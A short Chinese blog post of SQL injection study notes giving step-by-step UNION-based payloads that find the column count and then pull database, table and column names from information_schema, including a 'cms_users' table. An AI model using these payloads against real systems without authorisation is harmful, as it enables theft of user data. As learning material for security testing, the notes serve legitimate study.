一、SQL 注入
1.1 看看是否有 sql 注入漏洞
加个引号可以看出来
1.2 判断是数字注入还是字符注入
字符:admin' and 1=1#
数字:admin and 1=1
1.3 获得数据库的信息:数据库名、表名、字段名、对应信息
1.3.1 首先获得这个表的字段数量
admin' and 1=1 order by [num] #
这个字段自己试可以试出来。
1.3.2 通过 union 获得当前数据库名
admin' and 1=2 union select 1,2,3,database(),4,5 #
1.3.3 查询 information_schema
数据库获得数据库所有表的名称
admin' and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() #
1.3.4 查询指定表中所有子段名称
admin' and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='cms_users' #
1.3.5 查询这个表的任意内容
admin' and 1=2 union [select 语句]
标签:基本,1.3,admin,数据库,union,黑客技术,select,schema From: https://www.cnblogs.com/nerd-/p/17879156.html